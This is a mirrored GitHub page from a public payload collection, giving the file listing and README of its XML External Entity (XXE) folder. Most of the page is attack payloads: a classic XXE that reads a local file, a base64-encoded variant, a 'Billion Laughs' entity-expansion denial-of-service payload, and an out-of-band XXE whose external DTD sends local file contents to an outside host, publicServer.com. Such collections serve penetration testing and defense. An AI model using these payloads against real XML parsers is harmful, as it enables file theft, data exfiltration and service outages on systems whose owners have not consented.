mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-13 23:02:46 +00:00

History

swisskyrepo c097f222f4 XXE payloads		2016-10-18 14:06:10 +07:00
..
Classic XXE B64 Encoded.xml	XXE payloads	2016-10-18 14:06:10 +07:00
Classic XXE.xml	XXE payloads	2016-10-18 14:06:10 +07:00
Deny Of Service - Billion Laugh Attack	XXE payloads	2016-10-18 14:06:10 +07:00
README.md	XXE payloads	2016-10-18 14:06:10 +07:00
XXE OOB Attack (Yunusov, 2013).xml	XXE payloads	2016-10-18 14:06:10 +07:00

README.md

XML External Entity

An XML External Entity attack is a type of attack against an application that parses XML input

Exploit

Classic XXE

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///sys/power/image_size">
]>
<data>&file;</data>

Classic XXE Base64 encoded

<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>

Deny Of Service - Billion Laugh Attack

<!DOCTYPE data [
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
<!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
<!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
]>
<data>&a4;</data>

XXE OOB Attack (Yunusov, 2013)

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>

File stored on http://publicServer.com/parameterEntity_oob.dtd
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;

Thanks to

https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing